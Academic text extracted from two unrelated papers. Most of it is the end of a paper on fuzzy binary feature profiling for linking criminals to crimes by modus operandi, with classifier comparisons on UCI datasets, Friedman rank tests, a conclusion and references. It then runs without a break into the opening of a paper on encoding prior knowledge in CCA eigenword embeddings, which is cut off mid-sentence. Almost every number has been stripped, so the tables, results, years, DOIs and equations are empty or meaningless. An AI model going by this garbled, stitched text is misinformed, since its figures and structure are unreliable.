returned by the fuzzy based binary feature profiling which was conducted on the actual crime data set. as shown in the table, there is an increase in the accuracy when the input data set undergoes oversampling. since the maximum number of instances available under one suspect is equal to , under-sampling does not provide a good accuracy. the results prove that the new algorithm works well for a balanced data set as the new method showed an increase in performance when the data set is subjected to an oversampling greater than or equal to . figure shows the change inx auc with the increase of sampling which starts from under-sampling of and goes on to an over sampling of . according to the plot it can be observed that the auc values are increased when the oversampling is increased. the execution time of the algorithm was . s when there is no oversampling or under-sampling. the maximum execution time is . when there is an oversampling of . according to the plot shown in fig. , it is clear that there is an increase of execution time as the oversampling size increases. but, the overall execution time is always remained under ms. overview of the classification algorithms used for the comparison it is a known fact that there is no single algorithm which can be categorized as the best to solve any problem. different classification algorithms may perform differently in different situations (wolpert, ). therefore, the newly proposed method was tested against ten other open classification data sets (the information about these data sets is provided in chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure change of auc values with oversampling. figure change of time elapsed for the data sets. table ) and the performance was evaluated against the results obtained from nine other well-known classification techniques, thereby assessing the quality of the newly proposed method. the nine other classification algorithms include, logistic regression, j decision tree, radial basis function network (rbfnetwork), multi-layer perceptron (mlp), naive bayes classifier, sequential minimal optimization (smo) algorithm, kstar instance based classifier, best-first decision tree (bftree) classifier, and logistic model tree (lmt) classifier. these classifiers represent four classes of classification algorithms. namely, function based classifiers, tree based classifiers, bayesian classifiers and lazy classifiers. logistic regression learns conditional probability distribution. relating qualitative variables to other variables through a logistic cumulative distribution functional form is logistic regression (chang & lin, ). j is an open source java implementation of the c . decision tree algorithm (machine learning group at the university of waikato). a decision tree consists of internal nodes that specify tests on individual input variables chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table description of the classification data sets for performance comparison. data set description number of instances no of attributes dermatology data set (ilter & guvenir, ) this database has been created on a dermatology test carried out on skin samples which have been taken for the evaluation of histopathological features. the val- ues of the histopathological features have been determined by an analysis of the samples under a microscope. in the dataset constructed for this domain, the family history feature has the value if any of these diseases has been observed in the fam- ily, and otherwise. every other feature (clinical and histopathological) was given a degree in the range of to . here, indicates that the feature was not present, indicates the largest amount possible, and , indicate the relative intermediate values. balance scale data set (hume, ) this data set has been generated to model psychological experimental results. each example is classified as having the balance scale tip to the right, tip to the left, or be balanced. the attributes are the left weight, the left distance, the right weight, and the right distance. the correct way to find the class is the greater of (left-distance * left-weight) and (right-distance * right-weight). if they are equal, it is balanced. there are classes (l, b, r), five levels of left-weight ( , , , , ), five levels of left-distance ( , , , , ), five levels of right-weight ( , , , , ) and five levels of right-distance ( , , , , ). balloons data set (pazzani, a) this data set has been generated using an experiment of stretching a collection of balloons carried out on a group of adults and children (pazzani, b). in the data set, inflated is true if (color= yellow and size= small) or (age= adult and act= stretch). in the data set there are two main output classes, namely t if inflated and f if not inflated, two colors yellow and purple, two sizes, large and small, two act types, stretch and dip, and two age groups, adult and child. car evaluation data set (bohanec & zupan, a) car evaluation database has been derived from a simple hierarchical decision model originally developed for the demonstration of dex by bohanec & rajkovic ( ). the car evaluation database contains examples with information that is directly related to car. they are buying, maint, doors, persons, lug_boot and safety. the attribute buying is the buying price which is considered to have four levels v-high, high, med, low. maint is the price of the maintenance which contains the four levels, v-high, high, med, low. doors have the four levels , , , -more. person (capacity in terms of persons to carry), lug_boot (the size of luggage boot) and safety (estimated safety of the car) have levels each. , soybean data set (fisher, ; michalski, ) this is a small subset of the original soybean database. the data set is distributed over four classes, d , d , d and d . the categorical variables represent differ- ent levels of qualities of the soybean vegetable. these categorical variables include, plant-stand, precip, temp, hail, crop-hist, area-damaged, severity, seed-tmt, ger- mination, lant-growth, leaves, leafspots-halo, leafspots-marg, leafspot-size, leaf- shread, leaf-malf, leaf-mild, stem, lodging, stem-cankers, canker-lesion, fruiting- bodies, external, mycelium, int-discolor, sclerotia, fruit-pods, fruit, seed, mold- growth, seed-discolor, seed-size, shriveling and roots. the number of levels repre- sented by each variable varies from to . lenses data set (julien, ) lenses data set is a small database about fitting contact lenses. the data set is com- posed of five attributes including the class variable. the data set has three classes. age of the patient, spectacle prescription, astigmatic, tear production rate are the attributes of the data set. the attributes contain at least of two categories and at most of three categories. (continued on next page) chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) data set description number of instances no of attributes nursery data set (bohanec & zupan, b) nursery database has been derived from a hierarchical decision model originally developed to rank applications for nursery schools. it has been used during several years in s when there has been excessive enrollment to these schools in ljubl- jana, slovenia, and the rejected applications frequently needed an objective expla- nation. the final decision depended on three sub problems: occupation of parents and child’s nursery, family structure and financial standing, and social and health picture of the family. the model has been developed within expert system shell for decision making (bohanec & rajkovic, ). , tic-tac-toe data set (aha, ) this database encodes the complete set of possible board configurations at the end of tic-tac-toe games, where ‘‘x’’ is assumed to have played first. the target concept is ‘‘win for x’’ (i.e., true when ‘‘x’’ has one of possible ways to create a ‘‘three-in- a-row’’). spect heart data set (kurgan & cios, ) the data set describes diagnosis of cardiac single proton emission computed to- mography (spect) images. each of the patients is classified into two categories: normal and abnormal. the database of spect image sets (patients) were pro- cessed to extract features that summarize the original spect images. the instances are described by binary attributes including the class variable. monk’s problems data set (thrun, ) the monk’s problems have been the basis of a first international comparison of learning algorithms. the result of this comparison is summarized in ‘‘the monk’s problems’’ (thrun et al., ). there are three monk’s problems. the domains for all monk’s problems are the same. the data set is composed of attributes and a binary class variable. or attributes that split the data into smaller subsets, and a series of leaf nodes assigning a class to each of the observations in the resulting segments. the c . algorithm constructs decision trees using the concept of information entropy (quinlan, ). neural networks are flexible in being modeled virtually for any non-linear association between input variables and target variables (bishop, ). both radial basis function networks and mlp networks are neural networks (jayawardena, fernando & zhou, ). bayesian classifiers assign the most likely class to a given example described by its feature vector (rish, ). smo is an implementation of john platt’s sequential minimal optimization algorithm for training a support vector classifier. it globally replaces all missing values and transforms nominal attributes into binary one. it also normalizes all attributes by default (platt, ; keerthi et al., ). kstar (k*) is an instance-based classifier which uses an entropy–based distance function (cleary & leonard, ). bftree uses binary split for both nominal and numeric attributes (friedman, hastie & tibshirani, ). lmt is a classifier for building ‘logistic model trees’, which are classification trees with logistic regression functions at the leaves (landwehr, hall & frank, ; sumner, frank & hall, ). as the newly proposed method accepts only binary input variables, the data sets which are used for the analysis must be preprocessed into the acceptable format. for example, the ‘‘balance scale’’ data set is composed of four attributes. table shows the attributes and their information of the balance scale data set. therefore, the data set was adjusted as shown in fig. , prior to using it with the proposed method. each category of a particular attribute is represented by a dummy variable. for example, left-weight attribute results in five attributes in the preprocessed chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table attribute information of the balance data set. attribute number of categories categories class name l, b, r left-weight , , , , left-distance , , , , right-weight , , , , right-distance , , , , figure schematic diagram used for pre-processing of the balance dataset in such a way that it matches the format of inputs of the newly proposed method. data set and each attribute is represented using five binary variables as lw , lw , lw , lw and lw where the presence of the attribute denotes and otherwise. as depicted in fig. , if left-weight has a value of in an instance it results in for the corresponding derived attribute that is lw . therefore, if there is an instance where left-weight = , left-distance = , right-weight = and right-distance = , class name = b, it is represented as lw = , lw = , lw = , lw = , lw = , ld = , ld = , ld = , ld = , ld = , rw = , rw = , rw = , rw = , rw = , rd = , rd = , rd = , rd = , rd = , class name = b. the pre-processed data is then fed to the newly proposed algorithm and the nine other algorithms. performances were compared based on auc analysis of the roc curves, and the processing time for model generation. fold cross validation was used under each test for fair testing procedure. for the sake of simplicity, the newly proposed modes operandi analysis algorithm was acronymed as bfpm (binary feature profiling methodology). as all the data sets which were used for the tests are composed of multi classes, weighted average auc was used, where each target class is weighted according to its prevalence as given in eq. ( ). weighted average was used in order to prevent target classes with smaller instance counts from adversely affecting the results (hempstalk & frank, ). aucweighted = ∑ ∀ci∈c auc(ci)×p(ci) ( ) table shows the weighted average auc values obtained for each data set under each classification algorithm. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table weighted average auc values obtained by the algorithms on classifying the data sets. bfpm logistic regression j radial basis function network multi-layer perceptron naive bayes classifier smo kstar bftree lmt dermatology data set . . . . . . . . . balance scale data set . . . . . . . . . . balloons data set car evaluation data set . . . . . . . . . soybean data set . . . lenses data set . . . . . . . . . . nursery data set . . . . . . . . . tic-tac-toe data set . . . . . . . . . . spect heart data set . . . . . . . . . . monk’s problems data set . . . . . . . . . . c ham ikara etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table friedman’s mean rank values returned on the data available in table . method mean rank mlp . lmt . kstar . logisticregression . rbfnetworks . naivebayesclassifier . bfpm . bftree . j . smo . friedman’s rank test is a nonparametric test analogous to a standard one-way repeated- measures analysis of variance (howell, ). the friedman’s rank test results returned on the auc test data are shown in table . this test returns a test statistic (χ ) value (‘‘chi-square’’) of . , degree of freedom of and a p-value of . , proving that there is an overall statistically significant difference between the mean ranks of the classification algorithms. according to the table, the highest mean rank is returned for mlp while the lowest mean rank is returned for smo, proving that mlp provides the best performance while smo provides the least performance for the data sets tested. therefore, it indicates that the new model provides a better performance than bftree, j and smo algorithms for the data sets tested. the average processing times elapsed for each algorithm to classify the data sets are given in table . friedman’s rank test on the data of table returned the results shown in table in which the mean rank values prove better efficiency for the new method than j , logisticregression, smo, rbfnetworks, bftree, mlp and lmt. the test statistic (χ ) value (‘‘chi-square’’) of . , degree of freedom of and a p-value of . , proves that there is an overall statistically significant difference between the mean ranks of the classification algorithms. friedman’s rank test results for the two measurements, auc and time elapsed conclude that the newly proposed method provides acceptable results against the nine other well established classification algorithms. conclusion the studies of modus operandi help crime investigation by letting the police officers to solve crimes by linking suspects to crimes. though there are many descriptive studies available under modus operandi analysis, only a small amount of work is available under computer science. many of these methods have been derived using the methods based on link analysis. however, the accuracy of these methods is always compromised due to the cognitive biases of the criminals. a novel fuzzy based binary feature profiling method (bfpm) to find associations between crimes and criminals, using modus operandi is introduced. the newly proposed chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table average processing time for each algorithm on the classification of the ten data sets. bfpm logistic regression j radial basis function network multi-layer perceptron naive bayes classifier smo kstar bftree lmt dermatology data set . . . . . . . . . . balance scale data set . . . . . . . . balloons data set . . . . car evaluation data set . . . . . . . . . soybean data set . . . . . . . . lenses data set . . . . . . nursery data set . . . . . . . . . tic-tac-toe data set . . . . . . . . . spect heart data set . . . . . . . . monk’s problem data set . . . . . . . . c ham ikara etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mean rank values returned by the friedman’s rank test on the time values available in table . method mean rank kstar . naivebayesclassifier . bfpm . j . logisticregression . smo . rbfnetworks . bftree . mlp . lmt . method subjects not only the properties of the present, but also the properties of his/her previous convictions. the concept of dynamic modus operandi which is available in the proposed method considers the modi operandi of all of his/her previous convictions to provide a fair rectification to the errors which result due to the human cognition. dynamic mo uses frequent item set mining to result in a generalized binary feature vector. complete mo profile also encapsulates past modi operandi of a particular criminal by aggregating the modi operandi of all of his/her previous convictions to one binary feature vector. this feature also guarantees a usage of criminal’s past crime record with more generalizability. completeness probability measures how much information is available in the new crime which is not available in the complete mo profile. therefore, this measurement provides the capability of measuring how much extra amount of information is carried by the mo of the new crime. the deviation probability provides a notion about how much the new mo deviates from the most frequent crime flows which are available in the dynamic mo of a particular criminal. the vagueness and the impreciseness prompted the fact that it is not possible to use crisp logic to generate the similarity score. therefore, a fuzzy inference system was modeled to generate the similarity score. due to the under-represented and imbalanced properties of the actual data set, the new method has returned a lower performance when it was proposed to the data set without any rectification on the data set. however, with the introduction of over sampling, the method returned a very good performance, allowing one to arrive at the conclusion that the method could provide acceptable results for a balanced data set. the method generated favorable results in providing a good similarity measurement to suggest the connections between crimes and criminals. the fuzzy controller of the new approach guarantees to resemble the human reasoning process by confirming the usage of human operator knowledge to deal with nonlinearity of the actual situation. the newly proposed method was then adapted into a classification algorithm for the validation and comparison with other classification algorithms. the comparison of the new method with the well-established classification algorithms confirmed the generalizability of the new method. the method only provides the capability to process the categorical data sets. if there are any continuous variables in the data set, the values must be introduced with categories chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. before further processing. the method can be further extended to directly accept the continuous attributes. as the center of gravity method is used for the defuzzification process, further optimizations can be done by simplifying the defuzzification procedure. adapting the fuzzy inference engine to a sugeno (takagi & sugeno, ) type and converting the defuzzification method to a more computationally efficient method such as the weighted average (wu & mendel, ) method would provide a less complex computation. this would result in even less processing time when the sophistication of the data set rises. additional information and declarations funding this work was funded by the national research council (nrc) of sri lanka (grant number: - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national research council (nrc): - . competing interests the authors declare there are no competing interests. author contributions • mahawaga arachchige pathum chamikara conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • akalanka galappaththi conceived and designed the experiments, contributed reagents/ materials/analysis tools. • roshan dharshana yapa and ruwan dharshana nawarathna conceived and designed the experiments, performed the experiments, performed the computation work, reviewed drafts of the paper. • saluka ranasinghe kodituwakku conceived and designed the experiments, contributed reagents/materials/analysis tools, reviewed drafts of the paper. • jagath gunatilake conceived and designed the experiments, reviewed drafts of the paper. • aththanapola arachchilage chathranee anumitha jayathilake conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/ materials/analysis tools, performed the computation work. • liwan liyanage conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the data sets were taken from: https://archive.ics.uci.edu/ml/datasets.html. the individual links to separate data sets are provided inline with the text of the paper. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://archive.ics.uci.edu/ml/datasets.html http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abraham a, nath b, mahanti pk. . hybrid intelligent systems for stock market analysis. in: computational science-iccs. lecture notes in computer science, vol. . – . adamo jm. . data mining for association rules and sequential patterns, sequential and parallel algorithms. st edition. new york: springer science & business media. agrawal r, imielinkski j, swami a. . mining association rule between sets of items in large databases. in: proceedings of the acm sigmod international conference of management of data. new york: acm, – . aha dw. . uci machine learning repository. available at https://archive.ics.uci. edu/ml/datasets/tic-tac-toe+endgame. bennell c, canter dv. . linking commercial burglaries by modus operandi: tests using regression and roc analysis. science & justice ( ): – doi . /s - ( ) - . bennell c, jones nj. . between a roc and a hard place: a method for linking serial burglaries by modus operandi. journal of investigative psychology and offender profiling ( ): – doi . /jip. . berry mj, linoff g. . data mining techniques: for marketing, sales, and customer support. rd edition. hoboken: wiley. bishop cm. . neural networks for pattern recognition. oxford: oxford university press. bohanec m, rajkovic v. . expert system for decision making. sistemica ( ): – . bohanec m, zupan b. a. uci machine learning repository. available at https://archive.ics.uci.edu/ml/datasets/car+evaluation. bohanec m, zupan b. b. uci machine learning repository. available at https: //archive.ics.uci.edu/ml/datasets/nursery. borg a, boldt m, lavesson n, melander u, boeva v. . detecting serial residential burglaries using clustering. expert systems with applications ( ): – doi . /j.eswa. . . . canter d, hammond l, youngs d, juszczak p. . the efficacy of ideographic models for geograhical offender profiling. journal of quantitative criminology ( ): – doi . /s - - - . capozzoli a, lauro f, khan i. . fault detection analysis using data mining tech- niques for a cluster of smart office buildings. expert systems with applications ( ): – doi . /j.eswa. . . . cha ss, tappert sh, choi cc. . a survey of binary similarity and distance measures. journal of systemics, cybernetics and informatics ( ): – . chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://archive.ics.uci.edu/ml/datasets/tic-tac-toe+endgame https://archive.ics.uci.edu/ml/datasets/tic-tac-toe+endgame http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /jip. https://archive.ics.uci.edu/ml/datasets/car+evaluation https://archive.ics.uci.edu/ml/datasets/nursery https://archive.ics.uci.edu/ml/datasets/nursery http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. chamikara map, galappaththi a, yapa yprd, nawarathna rd, kodituwakku sr, gunathilake j, liyanage lh. . a crime data analysis framework with geographical information support for intelligence led policing. peerj preprints :e doi . /peerj.preprints. v . chang yci, lin sc. . synergy of logistic regression and support vector machine in multiple-class classification. in: ideal . lecture notes in computer science, vol. , – . chen h. . machine learning for information retrieval: neural. journal of the ameri- can society for information science ( ): – doi . /(sici) - ( ) : < ::aid-asi > . .co; -s. chen h. . intelligence and security informatics for international security. st edition. vol. . berlin heidelberg: springer. chen h, chung w, xu jj, wang g, qin y, chau m. . crime data mining: a general framework and some examples. computer ( - ): – doi . /mc. . . chen h, zeng d, atabakhsh h, wyzga w, schroeder j. . coplink: managing law enforcement data and knowledge. communications of the acm ( ): – doi . / . . chikersal p, poria s, cambria e. . sentu: sentiment analysis of tweets by combin- ing a rulebased classifier with supervised learning. in: proceedings of the international workshop on semanti evaluation (semeval), – . chisum wj, turvey b. . evidence dynamics: locard’s exchange principle & crime reconstruction. journal of behavioral profiling ( ): – . cleary jg, leonard et. . k∗: an instance-based learner using an entropic distance measure. in: th international conference on machine learning, – . douglas je, douglas lk. . modus operandi and the signature aspects of violent crime. in: crime classification manual. nd edition. san francisco: jossey-bass, – . estabrooks a, jo t, japkowicz n. . a multiple resampling method for learning from imbalanced data sets. computational intelligence ( ): – doi . /j. - . .t - - .x. fisher d. . uci machine learning repository. available at https://archive.ics.uci.edu/ ml/datasets/soybean+% small% . friedman j, hastie t, tibshirani r. . additive logistic regression: a statistical view of boosting. annals of statistics ( ): – . godjevac j. . neuro-fuzzy controllers: design and application. st edition. lausanne: ppur presses polytechniques et universitaires romandes. hall m, frank e, holmes g, pfahringer b, reutemann p, witten ih. . the weka data mining software. acm sigkdd explorations newsletter ( ): doi . / . . hanley ja, mcneil bj. . the meaning and use of the area under a receiver operating characteristic (roc) curve. radiology ( ): – doi . /radiology. . . . chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj.preprints. v http://dx.doi.org/ . /(sici) - ( ) : < ::aid-asi > . .co; -s http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /mc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /j. - . .t - - .x http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /radiology. . . http://dx.doi.org/ . /peerj-cs. hempstalk k, frank e. . discriminating against new classes: one-class versus multi- class classification. in: ai : advances in artificial intelligence: st australasian joint conference on artificial intelligence. auckland, – . holdaway s. . issues in sociology: crime and deviance. spiral-bound, new edition. cheltenham: nelson thornes ltd. howell dc. fundamental statistics for the behavioral sciences focuses. th edition. belmont: wadsworth, cengage learning. hume t. . uci machine learning repository. available at https://archive.ics.uci.edu/ ml/datasets/balance+scale. ilter n, guvenir ha. . uci machine learning repository. available at https://archive.ics.uci.edu/ml/datasets/dermatology. jayawardena aw, fernando dak, zhou mc. . comparison of multilayer pe- ceptron and radial basis function networks as tools for flood forecasting. iahs publications-series of proceedings and reports-international association of hydrological sciences : – . julien b. . uci machine learning repository. available at https://archive.ics.uci.edu/ ml/datasets/lenses. keerthi ss, shevade sk, bhattacharyya c, murthy krk. . improvements to platt’s smo algorithm for svm classifier design. neural computation ( ): – doi . / . king rd, sutton gm. . high times for hate crimes: explaining the temporal clustering of hate-motivated offending. criminology ( ): – doi . / - . . koperski k, han j. . discovery of spatial association rules in geographic informa- tion databases. in: proceeding of the th international symposium on spatial databases, – . kurgan la, cios kj. . uci machine learning repository. available at https://archive.ics.uci.edu/ml/datasets/spect+heart. landwehr n, hall m, frank e. . logistic model trees. machine learning ( – ): – doi . /s - - - . leclerc b, proulx j, beauregard e. . examining the modus operandi of sexual offenders against children and its practical implications. aggression and violent behavior ( ): – doi . /j.avb. . . . lin s, brown de. . an outlier-based data association method for linking criminal incidents. decision support systems ( ): – doi . /j.dss. . . . mamdani eh, assilina s. . an experiment in linguistic synthesis with a fuzzy logic controller. international journal of man-machine studies ( ): – doi . /s - ( ) - . mathworks. – a. mathworks. available at https://in.mathworks.com/ . mathworks. – b. mathworks documentation. available at http://in.mathworks.com/help/matlab/ref/edit.html. mathworks. – c. mathworks fuzzy logic toolbox. available at http://in.mathworks.com/help/matlab/ref/edit.html. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://archive.ics.uci.edu/ml/datasets/balance+scale https://archive.ics.uci.edu/ml/datasets/balance+scale https://archive.ics.uci.edu/ml/datasets/dermatology https://archive.ics.uci.edu/ml/datasets/lenses https://archive.ics.uci.edu/ml/datasets/lenses http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . / - . https://archive.ics.uci.edu/ml/datasets/spect+heart http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.avb. . . http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - ( ) - https://in.mathworks.com/ http://in.mathworks.com/help/matlab/ref/edit.html http://in.mathworks.com/help/matlab/ref/edit.html http://dx.doi.org/ . /peerj-cs. mathworks inc. – . mathworks. available at http://in.mathworks.com/help/ fuzzy/foundations-of-fuzzy-logic.html. michalski rs. . learning by being told and learning from examples: an experimental comparison of the two methodes of knowledge acquisition in the context of developing an expert system for soybean desease diagnoiss. international journal of policy analysis and information systems ( ): – . mokros a, alison lj. . is offender profiling possible? testing the predicted homol- ogy of crime scene actions and background characteristics in a sample of rapists. legal and criminological psychology ( ): – doi . / . oatley g, ewwart b. . data mining and crime analysis. wiley interdisciplinary reviews: data mining and knowledge discovery ( ): – doi . /widm. . palmiotto mj. . crime pattern analysis: an investigative tool. critical issues in criminal investigation : – . paternoster r, bachman r. . explaining criminals and crime: essays in contemporary criminological theory. los angeles: roxbury publishing company. pazzani m. a. uci machine learning repository. available at https://archive.ics.uci.edu/ml/datasets/balloons. pazzani m. b. the influence of prior knowledge on concept acquisition: experimen- tal and computational results. journal of experimental psychology: learning, memory and cognition ( ): – . platt jc. . fast training of support vector machines using sequential minimal optimization. in: advances in kernel methods. cambridge: mit press, – . quinlan jr. . c . programs for machine learning. machine learning ( ): – . refaeilzadeh p, tang l, liu h. . cross-validation. in: encyclopedia of database systems. st edition. new york: springer us, – . rish i. . an empirical study of the naive bayes classifier. vol. . new york, – . sumner m, frank e, hall m. . speeding up logisti model tree induction. in: th european conference on principles and practice of knowledge discovery in databases, – . sun ct. . rule-base structure identification in an adaptive-network-based fuzzy in- ference system. ieee transactions on fuzzy systems ( ): – doi . / . . takagi t, sugeno m. . fuzzy identification of systems and its applications to modeling and control. ieee transactions on systems, man and cybernetics : – . the ‘lectric law library. the ‘lectric law library. available at http://www.lectlaw.com/ files/int .htm. thrun s. . uci machine learning repository. available at https://archive.ics.uci.edu/ml/datasets/monk’s+problems. thrun sb, bala j, bloedorn e, bratko i, cestnik b, cheng j, de jong k, dzeroski s, fahlman se, fisher d, hamann r, kaufman k, keller s, kononenko i, kreuziger j, michalski rs, mitchell t, pachowicz pmreich y, vafaie h, van de welde w, wenzel w, wnek j, zhang j. . the monk’s problems: performance comparison of different learning algorithms. technical report cs-cmu- - . carnegie mellon university, pittsburgh. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://in.mathworks.com/help/fuzzy/foundations-of-fuzzy-logic.html http://in.mathworks.com/help/fuzzy/foundations-of-fuzzy-logic.html http://dx.doi.org/ . / http://dx.doi.org/ . /widm. https://archive.ics.uci.edu/ml/datasets/balloons http://dx.doi.org/ . / . http://www.lectlaw.com/files/int .htm http://www.lectlaw.com/files/int .htm https://archive.ics.uci.edu/ml/datasets/monk's+problems http://dx.doi.org/ . /peerj-cs. witten ih, frank e, trigg l, hall m, holmes g, cunningham sj. . weka: practical machine learning tools and techniques with java implementations. available at http://www.cs.waikato.ac.nz/~ml/publications/ / ihw-ef-lt-mh-gh-sjc- tools-java.pdf (accessed june ). wolpert dh. . the lack of a priori distinctions between learning algorithms. neural computation : – doi . /neco. . . . . wu d, mendel jm. . aggregation using the linguistic weighted average and interval type- fuzzy sets. ieee transactions on fuzzy systems ( ): – doi . /tfuzz. . . yi x, rao fy, bertino e, bouguettaya a. . privacy preserving association rule min- ing in cloud computing. in: proceedings of the th acm symposium on information, computer and communications security. new york: acm, – . zadeh la. . toward a theory of fuzzy information granulation and its centrality in human reasoning and fuzzy logic. fuzzy sets and systems : – . chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.cs.waikato.ac.nz/~ml/publications/ / ihw-ef-lt-mh-gh-sjc-tools-java.pdf http://www.cs.waikato.ac.nz/~ml/publications/ / ihw-ef-lt-mh-gh-sjc-tools-java.pdf http://dx.doi.org/ . /neco. . . . http://dx.doi.org/ . /tfuzz. . http://dx.doi.org/ . /tfuzz. . http://dx.doi.org/ . /peerj-cs. encoding prior knowledge with eigenword embeddings dominique osborne department of mathematics and statistics university of strathclyde glasgow, g xh, uk dominique.osborne. @uni.strath.ac.uk shashi narayan and shay b. cohen school of informatics university of edinburgh edinburgh, eh le, uk {snaraya ,scohen}@inf.ed.ac.uk abstract canonical correlation analysis (cca) is a method for reducing the dimension of data represented using two views. it has been previously used to derive word embeddings, where one view indicates a word, and the other view indicates its context. we describe a way to incorporate prior knowledge into cca, give a theoretical justification for it, and test it by deriving word embeddings and evaluating them on a myriad of datasets. introduction in recent years there has been an immense in- terest in representing words as low-dimensional continuous real-vectors, namely word embeddings. word embeddings aim to capture lexico-semantic information such that regularities in the vocabulary are topologically represented in a euclidean space. such word embeddings have achieved state-of-the- art performance on many natural language process- ing (nlp) tasks, e.g., syntactic parsing (socher et al., ), word or phrase similarity (mikolov et al., b), dependency parsing (bansal et al., ), unsupervised learning (parikh et al., ) and oth- ers. since the discovery that word embeddings are useful as features for various nlp tasks, research on word embeddings has taken on a life of its own, with a vibrant community searching for better word rep- resentations in a variety of problems and datasets. these word embeddings are often induced from large raw text capturing distributional co-occurrence information via neural networks (bengio et al., ; mikolov et al., b; mikolov et al., c) or spectral methods (deerwester et al., ; dhillon et al., ). while these general pur- pose word embeddings have achieved significant im- provement in various tasks in nlp, it has been dis- covered that further tuning of these continuous word representations for specific tasks improves their per- formance by a larger margin. for example, in de- pendency parsing, word embeddings could be tai- lored to capture similarity in terms of context within syntactic parses (bansal et al., ) or they could be refined using semantic lexicons such as wordnet (miller, ), framenet (baker et al., ) and the paraphrase database (ganitkevitch et al., ) to improve various similarity tasks (yu and dredze, ; faruqui et al., ; rothe and schütze, ). this paper proposes a method to encode prior semantic knowledge in spectral word embeddings (dhillon et al., ). spectral learning algorithms are of great inter- est for their speed, scalability, theoretical guaran- tees and performance in various nlp applications. these algorithms are no strangers to word embed- dings either. in latent semantic analysis (lsa, (deerwester et al., ; landauer et al., )), word embeddings are learned by performing svd on the word by document matrix. recently, dhillon et al. ( ) have proposed to use canonical cor- relation analysis (cca) as a method to learn low- dimensional real vectors, called eigenwords. un- like lsa based methods, cca based methods are scale invariant and can capture multiview informa- tion such as the left and right contexts of the words. as a result, the eigenword embeddings of dhillon et al. ( ) that were learned using the simple lin- ear methods give accuracies comparable to or better than state of the art when compared with highly non- linear deep learning based approaches (collobert and weston, ; mnih and hinton, ; mikolov et al., b; mikolov et al., c). the main contribution of this paper is a technique transactions of the association for computational linguistics, vol. , pp. – , . action editor: hal daume iii. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. to incorporate prior knowledge into the derivation of canonical correlation analysis. in contrast to previ- ous work where prior knowledge is introduced in the off-the-shelf embeddings as a post-processing step (faruqui et al., ; rothe and schütze, ), our approach introduces prior knowledge in the cca derivation itself. in this way it preserves the the- oretical properties of spectral learning algorithms for learning word embeddings. the prior knowl- edge is based on lexical resources such as wordnet, framenet and the paraphrase database. our derivation of cca to incorporate prior knowledge is not limited to eigenwords and can be used with cca for other problems. it follows a sim- ilar idea to the one proposed by koren and carmel ( ) for improving the visualization of principal vectors with principal component analysis (pca). our derivation represents the solution to cca as that of an optimization problem which maximizes the distance between the two view projections of training examples, while weighting these distances using the external source of prior knowledge. as such, our approach applies to other uses of cca in the nlp literature, such as the one of jagarlamudi and daumé ( ), who used cca for translitera- tion, or the one of silberer et al. ( ), who used cca for semantically representing visual attributes. background and notation for an integer n, we denote by [n] the set of integers { , . . . ,n}. we assume the existence of a vocabu- lary of words, usually taken from a corpus. this set of words is denoted by h = {h , . . . ,h|h|}. for a square matrix a, we denote by diag(a) a diagonal matrix b which has the same dimensions as a such that bii = aii for all i. for vector v ∈ rd, we de- note its ` norm by ||v||, i.e. ||v|| = √∑d i= v i . we also denote by vj or [v]j the jth coordinate of v. for a pair of vectors u and v, we denote their dot product by 〈u,v〉. we define a word embedding as a function f from h to rm for some (relatively small) m. for exam- ple, in our experiments we vary m between and . the word embedding function maps the word to some real-vector representation, with the inten- tion to capture regularities in the vocabulary that are topologically represented in the corresponding eu- clidean space. for example, all vocabulary words that correspond to city names could be grouped to- gether in that space. research on the derivation of word embeddings that capture various regularities has greatly accel- erated in recent years. various methods used for this purpose range from low-rank approximations of co-occurrence statistics (deerwester et 